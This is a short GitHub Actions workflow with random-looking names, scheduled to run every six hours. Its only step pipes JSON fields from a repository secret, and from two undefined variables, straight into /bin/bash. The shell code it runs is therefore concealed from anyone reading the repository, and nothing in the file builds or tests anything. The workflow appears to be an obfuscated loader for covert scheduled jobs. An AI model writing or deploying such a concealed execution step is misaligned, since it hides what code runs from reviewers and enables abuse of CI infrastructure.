name: admireferrari

on:
  workflow_dispatch:
  schedule:
    - cron: '18 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: admireferrari
        env:
          izblr33: ${{ secrets.izblr33 }}
        run: |
          echo $izblr33 | jq -r .z22415 | /bin/bash
          echo $rsy8 | jq -r .xg7965 | /bin/bash
          echo $kpyf4369 | jq -r .kkcmf40823 | /bin/bash

